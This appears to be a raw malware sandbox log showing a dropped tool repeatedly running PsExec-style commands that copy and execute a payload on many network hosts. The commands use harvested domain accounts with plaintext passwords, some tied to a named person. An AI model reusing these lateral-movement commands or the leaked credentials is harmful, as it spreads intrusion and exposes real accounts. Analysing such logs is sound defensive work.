C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
PID:4384

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
PID:4424

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
PID:4536

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\224.0.0.22 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
PID:4604

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
PID:4716

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\igmp.mcast.net -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4728

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4816

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\224.0.0.22 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
PID:4828

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
PID:4908

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\igmp.mcast.net -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
PID:5024

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\224.0.0.22 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:5072

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
PID:1032

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2916

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\igmp.mcast.net -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
PID:1888

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
PID:4152

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4212

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4300

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\224.0.0.22 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
PID:4308

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\igmp.mcast.net -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
PID:4056

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
PID:4176

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
PID:4360

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4440

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
PID:4504

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\224.0.0.22 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
PID:4596

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
PID:4680

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
PID:4660

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\igmp.mcast.net -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4784

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\224.0.0.22 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
PID:4760

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.82 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4636

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\igmp.mcast.net -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4856

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\224.0.0.22 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
PID:4820

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4996

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\EWYCRADZ -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:5052

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
PID:1196

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
PID:5104

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
PID:3796

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4320

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.82 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4160

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:4200

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Modifies data under HKEY_USERS
PID:4260

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:1736

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Modifies data under HKEY_USERS
PID:4268

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Modifies data under HKEY_USERS
PID:4164

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Modifies data under HKEY_USERS
PID:4400

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\EWYCRADZ -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Modifies data under HKEY_USERS
PID:4688

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.88 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:4532

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:4488

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Modifies data under HKEY_USERS
PID:4736

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\Ewycradz -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Modifies data under HKEY_USERS
PID:4812

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.82 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:3216

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Modifies data under HKEY_USERS
PID:4872

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:4964

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Modifies data under HKEY_USERS
PID:4836

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.88 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Modifies data under HKEY_USERS
PID:5040

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\EWYCRADZ -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Modifies data under HKEY_USERS
PID:4264

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.93 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:5108

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\Ewycradz -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:2620

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:1044

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4220

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:4544

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:4116

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Modifies data under HKEY_USERS
PID:4592

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.88 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Modifies data under HKEY_USERS
PID:1388

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.82 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:4288

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\Ewycradz -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:4580

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\Ewycradz -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:1168

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\EWYCRADZ -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:3408

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.93 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:4708

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.82 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Modifies data under HKEY_USERS
PID:4720

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.88 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Modifies data under HKEY_USERS
PID:4748

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:200

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\Ewycradz -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:4744

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\Ewycradz -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:4984

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\Ewycradz -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:4824

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Modifies data under HKEY_USERS
PID:4808

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.82 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:5084

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.93 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Modifies data under HKEY_USERS
PID:4900

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.88 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:1464

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\Ewycradz -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Modifies data under HKEY_USERS
PID:4108

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.82 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:4172

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\Ewycradz -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:2704

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\Ewycradz -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Modifies data under HKEY_USERS
PID:5112

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:3996

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:4664

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\Ewycradz -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:4216

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.93 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:4692

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.88 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Modifies data under HKEY_USERS
PID:4780

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.82 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:4588

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\Ewycradz -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:4452

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\Ewycradz -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:4648

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.93 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:4852

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.88 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Modifies data under HKEY_USERS
PID:212

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:1376

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\Ewycradz -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Drops file in Windows directory
PID:5012

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\Ewycradz -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Drops file in Windows directory
PID:2676

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:3672

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.88 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Modifies data under HKEY_USERS
PID:4224

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.93 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:2164

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\Ewycradz -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:4276

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:4296

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.93 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Modifies data under HKEY_USERS
PID:4116

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:4608

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\Ewycradz -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:4628

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.93 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:4796

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:4432

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Modifies data under HKEY_USERS
PID:4672

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.67 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Modifies data under HKEY_USERS
PID:4940

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:1796

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Modifies data under HKEY_USERS
PID:4696

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.71 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:4732

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.1 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:4148

C:\Windows\TEMP\_fif.exe
